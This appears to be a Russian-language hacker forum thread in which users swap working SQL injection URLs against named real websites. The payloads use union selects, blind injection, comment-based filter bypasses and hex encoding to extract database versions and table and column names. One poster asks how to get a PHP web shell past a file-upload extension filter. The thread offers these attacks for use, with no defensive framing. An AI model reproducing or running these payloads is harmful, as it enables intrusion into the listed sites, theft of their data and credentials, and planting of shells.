я думаю он имел ввиду, что может не хватить прав на перезапись хтаксеса, если он там уже лежит

http://www.mibf.ru/index.php?id=23+union+select+0,1,2,3,4,5,6,7,8,9
pomoqite raskrutit skul

пока получилась только слепая инъекция:

http://www.mibf.ru/index.php?id=23+and+substring(version(),1,1)=5--+

LokbatanLi
Если девятое поле не числовое отрабатывает редирект, а потом в урле вывод
http://www.mibf.ru/index.php?id=-23+union+select+1,2,3,4,5,6,7,version(),null,10/*

v1d0qz
Специально поставил хекс\анхекс ибо на въетнамском сайте у него дальше 99% начнутся проблемы с кодировкой, он опять придёт сюда с вопросом, и опять подарит мне "воу, большое!". А зачем мне два больших "воу", сам подумай? Я с одним-то не знаю что теперь делать

http://www.armeniafund.org/press_releases/press_releases.php?id=-234+union+select+0,1,2,3,4,5,6

version()-4.0.27

mysql.user-net access

vot tolko nasel table_name-login nu ne moqu ne kak nayti column_name//

esli mojno pomoqite pojalusta//

i pomoymu bil sposob mojno nayti v 4 vetke column_name esli znaem table_name//
nu ne znayuk kak eto bil i qde 4ital..
pomoqite..

а как насчет вывод таблиц (information_schema.tables фильтруется) там тоже фильтруется....
можно и так

http://www.hoanganjsc.com.vn/product.php?prodid=-90+/*!union*/+select+1,2,version(),4,5,6,7,8,9,0,11,12,13,14,15 ,16,17,18,19 ,20,21,22,23,24,25,26,27,28,29,30,31,32,33--

Заливаю шелл shell.php, shell.php.doc, shell.php.txt

выводит такую ошибку

Wrong field content:

File - allowed file extensions are PDF, PPT, PPS, DOC, XLS, TXT, HTM, HTML, GIF, JPG, RAR, ZIP

Как еще можно попробывать залить шелл?

Заранее всем спасибо!

Не проходит.

http://www.hoanganjsc.com.vn/product.php?prodid=-90+/*!union*/select+1,2,UNHEX(HEX(concat_ws(0x3a,table_schema,t able_name,column_name))),4,5,6,7,8,9,0,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1,32,33/**/from/**/information_schema.columns+limit+1,1--